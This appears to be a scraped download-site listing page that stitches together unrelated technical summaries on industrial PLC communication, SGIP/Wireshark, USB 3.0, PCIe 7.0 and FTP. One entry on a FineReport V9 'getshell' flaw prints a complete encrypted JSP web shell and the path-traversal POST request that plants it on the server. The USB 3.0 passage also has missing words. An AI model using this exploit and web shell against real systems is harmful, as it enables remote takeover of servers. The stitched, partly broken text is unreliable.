Labview通过FINS TCP协议实现与欧姆龙PLC全面通讯:支持多种数据类型读写操作,涵盖CIO区、W区、D区及布尔量、整数、浮点数、字符串,软件无加密保护,Labview通过FINS tcp协议与欧姆龙PLC通讯,支持CIO区,W区,D区,布尔量,整数,浮点数,字符串读写操作,软件无加密 ,核心关键词:Labview; FINS tcp协议; 欧姆龙PLC; CIO区; W区; D区; 读写操作; 布尔量; 整数; 浮点数; 字符串; 无加密。,欧姆龙PLC通讯利器:Labview FINS TCP协议支持多类型数据读写操作
2025-08-27 10:10:21 645KB xbox
1
内容概要:本文详细介绍了如何使用LabVIEW进行欧姆龙PLC的TCP通讯,特别是针对FINS/TCP协议的具体实现方法。文中涵盖了从TCP连接建立、命令帧构造、数据读写(包括浮点数、字符串、布尔量等)、异常处理等多个方面,并提供了具体的代码示例。此外,作者还分享了一些实用技巧,如地址转换、大端序处理、批量读写优化等,以及实际测试效果对比。最后提到代码已在Gitee和GitHub开源,附带性能优化和稳定性增强措施。 适合人群:从事工业自动化控制领域的工程师和技术人员,尤其是熟悉LabVIEW并希望深入了解PLC通讯机制的人士。 使用场景及目标:适用于需要高效稳定的PLC通讯解决方案的企业和个人开发者。主要目标是在不依赖第三方软件的情况下,利用LabVIEW直接与欧姆龙PLC进行通信,提高系统的灵活性和响应速度。 其他说明:文章不仅提供了理论讲解,还有丰富的实战经验分享,帮助读者更好地理解和掌握相关技术细节。同时强调了该方案相比传统OPC方式的优势,在多个应用场景中表现出色。
2025-08-27 10:07:50 102KB
1
SGIP(Short Message Gateway Interworking Protocol)是中国联通用于短信服务的一种通信协议,它主要用于短信网关之间的数据交换。Wireshark是一款广泛使用的网络封包分析软件,能够抓取并解析网络流量,帮助网络管理员和开发者深入理解网络通信过程。本文将详细介绍如何使用Wireshark解析SGIP协议以及SGIP的相关知识点。 1. SGIP协议简介: SGIP是基于TCP/IP协议栈设计的,主要功能包括短信的发送、接收、存储转发等。它定义了短信中心(SMSC)与其他系统如增值业务平台、移动交换中心(MSC)之间的接口,支持各种短信业务,如点对点短信、群发短信、彩信等。协议结构主要包括消息头、消息体和消息尾,其中消息头包含消息类型、序列号等关键信息。 2. Wireshark解析SGIP插件: Wireshark原生可能不支持SGIP协议的解析,但可以通过安装第三方插件来实现。在本案例中,"sgip"文件很可能是该插件,用户需要先将该文件安装到Wireshark的插件目录,然后重启Wireshark。一旦安装成功,Wireshark将能够识别并解析SGIP协议的数据包,展示出易于理解的消息结构和内容。 3. 使用Wireshark进行SGIP分析: - **捕获设置**:首先设置过滤器,确保只捕获SGIP相关的网络流量,例如输入"tcp.port == 7890"(假设SGIP使用的是默认端口7890)。 - **数据包解析**:在捕获的数据包中,可以看到SGIP消息的各个字段,如消息类型、消息长度、源地址、目标地址、短信内容等。 - **协议层次分析**:Wireshark会按照SGIP协议的层次结构展开数据包,方便查看每个消息的上下文。 - **消息内容查看**:对于短信内容,Wireshark会尝试解码ASCII或Unicode编码,以便于阅读。 - **异常检测**:通过分析Wireshark提供的错误提示和统计信息,可以发现网络通信中的异常情况,如丢包、重传、超时等。 4. SGIP协议关键点: - **消息类型**:SGIP协议定义了多种消息类型,如连接请求、连接响应、发送请求、发送响应、释放连接等,每种消息都有其特定的用途。 - **编码方式**:SGIP支持GSM 7位编码、UCS2等编码方式,用于处理不同字符集的短信内容。 - **服务质量**:协议中包含了对优先级、可靠性等服务质量参数的处理,以适应不同的业务需求。 - **安全机制**:虽然SGIP协议本身没有内置加密机制,但在实际应用中通常会结合SSL/TLS等安全协议进行传输加密。 5. 应用场景: - **短信服务提供商**:用于构建和维护短信服务平台,提供给企业客户进行短信发送和接收。 - **移动应用开发**:在开发需要发送短信验证码或通知的应用时,开发者需要理解SGIP协议以便与短信网关对接。 - **网络监控**:网络运维人员通过Wireshark分析SGIP流量,可以诊断短信服务的问题,提升服务质量。 了解并掌握SGIP协议和Wireshark解析技巧,对于从事短信服务相关的开发、运维工作至关重要。通过Wireshark这样的工具,我们可以深入理解SGIP协议的工作原理,有效地定位和解决问题,优化短信服务的性能和稳定性。
2025-08-27 02:21:44 144KB SGIP wireshark
1
无处不在的通用串行 ( )接口即将迎接又一次换代,以便紧跟连接带宽需求不断增长的步伐。USB3.0或所谓“超高速USB”预计将在传输速度、 和灵活性方面向前跨越一大步。USB 3.0的开发方向包括提供更高的传输率、提高最大总线功率和设备电流、提供全新的 管理功能以及向下兼容USB2.0的新型电缆和连接器。而最显著的变化是新增了一条与现有USB 2.0总线并行的物理总线
2025-08-26 17:54:32 1.2MB USB
1
上位机串口IAP升级(基于Ymodem协议的stm32f405rgt6+CubeMx+IAP在线升级)
2025-08-26 08:12:05 102.75MB stm32
1
三菱FX5U PLC Modbus TCP协议服务器与客户端案例程序详解:含调试工具与通讯协议配置注解,三菱FX5U PLC的Modbus TCP协议服务器与客户端案例程序详解:包含调试工具、程序注解及通讯协议配置指南,三菱FX5U modbus tcp协议 plc做服务器和客户端案例程序,提供调试工具,程序注解,通讯协议功能的配置。 ,三菱FX5U; modbus tcp协议; PLC服务器与客户端案例; 调试工具; 程序注解; 通讯协议配置,三菱FX5U PLC:Modbus TCP协议服务器与客户端案例程序及调试工具全解析
2025-08-25 23:00:37 1.4MB rpc
1
PCI Express(简称PCIe)是一个高速串行计算机扩展总线标准,主要用于计算机内部连接各种外围设备。PCIe 7.0规范是PCIe技术发展的最新阶段,其提供了比以往更高带宽的数据传输能力,适用于处理大量数据的高性能计算环境。 PCIe技术自2002年提出以来,已经经历了多个版本的迭代发展,每个新版本都致力于提供更高的数据传输速率和更好的性能,以满足不断增长的数据处理需求。PCIe 7.0作为该技术的最新标准,代表了当前硬件接口技术的最前沿水平。 PCIe技术的核心优势在于其高带宽和高效率的数据传输能力。PCIe总线采用点对点的数据传输方式,每个设备通过一条专用的通道与PCIe根复合体连接,这大大降低了数据传输过程中的冲突和延迟,确保数据传输的高效性和稳定性。 PCIe的链路(link)是指PCIe设备之间的物理连接。每个PCIe链路由一对差分信号线组成,通过这些信号线,数据可以高速双向传输。PCIe设备在物理层面可以是多个链路的集合,这些链路可以根据需要进行聚合,以实现更高的数据传输速率。 PCIe的架构(fabric topology)是整个PCIe设备互连的拓扑结构,它决定了各个PCIe设备如何通过链路相互连接。在PCIe架构中,复杂的拓扑结构可以通过PCIe交换器(switch)和桥接器(bridge)实现。PCIe交换器提供了灵活的连接方式,使得不同的PCIe设备可以形成更加复杂和高效的互连网络。 在规范文件中,PCI-SIG组织对PCIe 7.0规范进行了详尽的说明,包括其架构、功能、性能参数等。此外,规范文件还强调了对文档使用中可能出现的任何错误不承担任何责任,同时声明该文档是“按原样”提供,不包含任何形式的保证。文档中还明确了对知识产权的处理,禁止修改文档内容,保留了PCI-SIG和其他产品名称的商标权。 PCIe技术的应用范围非常广泛,包括服务器、工作站、台式机和笔记本电脑在内的各种计算机平台。此外,PCIe技术还被广泛应用于图形处理、存储、网络和工业自动化等领域。随着技术的不断发展,PCIe标准也在不断更新和升级,以适应新应用需求和技术趋势。 PCIe 7.0规范的推出,是PCIe技术发展的又一个里程碑,其为未来计算机系统提供了更高性能的硬件接口标准,将推动计算机技术的发展进入一个新的阶段。
2025-08-25 10:02:14 30.37MB Express 硬件接口 通信协议 计算机架构
1
### 帆软V9getshell1:任意文件覆盖与JSP Web Shell植入详解 #### 一、背景介绍 帆软软件有限公司(FineSoft)是中国领先的企业级报表工具及商业智能解决方案提供商,其核心产品之一为FineReport报表设计工具。在2023年某次安全研究中发现了一个严重安全漏洞——任意文件覆盖(Arbitrary File Overwrite),该漏洞允许攻击者通过特定的操作路径上传恶意JSP脚本到目标服务器上,进而获得服务器权限。这一漏洞被命名为“帆软V9getshell1”。 #### 二、漏洞原理 ##### 2.1 任意文件覆盖机制 任意文件覆盖是指攻击者能够替换或修改服务器上的现有文件。在帆软报表系统的实现中,存在一处逻辑缺陷使得攻击者可以利用该功能来覆盖特定的JSP文件。 ##### 2.2 JSP马的上传与执行 1. **文件路径构造**:攻击者通过精心构造请求中的`filePath`参数,指向一个合法的JSP文件路径。例如,攻击者可以通过设置`filePath`为`../../../../WebReport/update.jsp`,将恶意代码写入到`WebReport`目录下的`update.jsp`文件中。 2. **恶意JSP代码**:攻击者准备了如下恶意JSP代码: ```jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%> <% class U extends ClassLoader{ U(ClassLoader c){ super(c); } public Class g(byte []b){ return super.defineClass(b,0,b.length); } } if(request.getParameter("pass")!=null) { String k=(""+UUID.randomUUID()).replace("-", "").substring(16); session.putValue("u",k); out.print(k); return; } Cipher c=Cipher.getInstance("AES"); c.init(2,new SecretKeySpec((session.getValue("u")+ "").getBytes(),"AES")); new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext); %> ``` 该代码实现了以下功能: - 通过`request.getParameter("pass")`判断是否接收到触发命令。 - 使用AES加密算法对会话中的密钥进行初始化,并解码用户发送的数据。 - 动态加载并执行解密后的类文件,实现远程代码执行。 3. **HTTP请求示例**:攻击者通过发送如下POST请求将恶意代码写入指定位置: ``` POST /WebReport/ReportServer? op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1 Host: 192.168.169.138:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36 Connection: close Accept-Au: 0c42b2f264071be0507acea1876c74 Content-Type: text/xml;charset=UTF-8 Content-Length: 675 {"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%>......","__CHARSET__":"UTF-8"} ``` 4. **利用Tomcat自带的JSP文件**:由于帆软报表系统通常部署在Apache Tomcat服务器上,攻击者可以利用Tomcat默认存在的JSP文件(例如`/tomcat-7.0.96/webapps/ROOT/index.jsp`)作为切入点,通过覆盖这些文件来植入恶意代码。 #### 三、修复建议 1. **升级补丁**:及时安装官方发布的最新版本或安全补丁,以修复已知的安全问题。 2. **限制文件路径**:对用户提交的文件路径进行严格的验证和过滤,避免攻击者通过构造恶意路径覆盖敏感文件。 3. **加强认证与授权**:对关键操作增加二次验证机制,限制非授权用户的访问权限,确保只有经过身份验证的用户才能执行敏感操作。 4. **审计日志记录**:开启并维护详细的审计日志,以便在发生异常情况时进行追踪和分析。 #### 四、总结 帆软V9getshell1这一漏洞揭示了在开发过程中忽视输入验证和权限控制所带来的潜在风险。企业应高度重视此类安全问题,并采取有效措施降低被攻击的风险。同时,用户也应增强安全意识,避免在不安全的网络环境中使用重要系统和服务。
2025-08-24 00:18:39 285KB java 网络协议 windows chrome
1
网络调试助手是一款集合了TCP与UDP服务客户端的调试工具,绿色软件,无所安装,这是Windows平台下开发的产品,非常适用,可以设定TCPserver TCP client.针对网络应用开发及调试工作,并且GPRS远程站点可以进行单独的数据监测,简化开发复杂度,提高开发速度,网络应用的数据收发状况,支持HEX多种数据格式解析,各版本Windows操作系统都适用,是网络数据监控必备的专业软件之一,而且不用微软dotNet框架的支持。
2025-08-23 16:54:41 486KB 网络 网络 网络协议
1
FTP的目标是提高文件的共享性,提供非直接使用远程计算机,使存储介质对用户透明和可靠高效地传送数据。虽然我们也可以手工使用它,但是它的主要作用是供程序使用的。在阅读本文之前最好能够阅读TCP协议标准规范和Telnet协议标准规范。 FTP协议(文件传输协议)是一种用于在计算机网络上传递文件的标准协议,它在RFC959标准文档中被正式定义。FTP的目标在于提高文件的共享性,允许用户间接地通过程序使用远程计算机,同时确保用户在不同主机系统间存储和检索文件时,文件存储系统的变化不会影响到用户。 在阅读有关FTP的详细文档之前,了解TCP协议和Telnet协议是必要的基础,因为FTP建立在这些协议之上,确保可靠和高效的文件传输。TCP(传输控制协议)负责确保数据在网络中可靠地传输,而Telnet协议处理远程登录,FTP则进一步扩展了在远程计算机上进行文件操作的能力。 FTP的主要作用是供程序使用,比如备份或镜像,尽管用户可以直接在终端上使用它,但其设计初衷是为了便于程序间的文件传输。FTP协议的设计考虑了多种计算机环境,包括大型主机、微型主机、个人工作站和TACs(远程访问控制器),使得协议既适用于复杂的网络环境,也便于实现。 RFC文档系列记录了FTP协议的发展历程,从最初的概念到逐步完善的标准化协议。例如,RFC114和RFC141是最早的文档之一,而RFC454标志着FTP的正式标准化。随着NCP(网络控制程序)向TCP的转变,RFC765文档正式将FTP定义为使用TCP的文件传输协议。新的版本对一些较小的文档错误进行了修正,并改进了协议特征的说明,增加了新的可选指令,如CDUP、SMNT、STOU、RMD、MKD、PWD和SYST,这些指令增强了FTP的灵活性和功能性。 FTP使用了一系列特定的术语和概念,例如ASCII字符集、权限控制、字节大小、控制连接和数据连接。ASCII字符集在FTP中指的是8位的编码集,用于标准化文本文件的传输。权限控制定义了用户在系统中的权限,以及对文件操作的权限,防止未授权或意外使用。FTP使用两种类型的字节大小,分别是文件的逻辑字节大小和用于数据传输的传输字节大小,后者通常为8位,与数据存储和结构解释无关。 控制连接是基于Telnet协议,用于交换命令与应答的通信链路。而数据连接是在特定模式和类型下用于全双工传输数据的连接,传输数据可以是文件的一部分、整个文件或多个文件。数据端口则用于建立数据连接,被动模式下服务器端在一个端口上监听,而主动模式下客户端建立和管理数据连接。 FTP指令集是控制信息的一部分,包含从用户FTP进程到服务器FTP进程的命令。这些指令允许用户执行一系列操作,如文件的上传、下载、删除、重命名和目录的创建和更改。FTP还支持错误恢复,用户可以从中断的地方继续文件传输。 综合而言,FTP协议通过一系列规范化的操作和结构化的指令集,为计算机网络中文件的传输提供了一种高效、稳定的方式。它不仅支持用户直接操作,也极大地增强了程序对远程文件系统的操作能力。随着计算机网络技术的发展,FTP也在不断演化,以满足日新月异的网络应用需求。
2025-08-22 19:04:08 353KB FTP协议 RFC959
1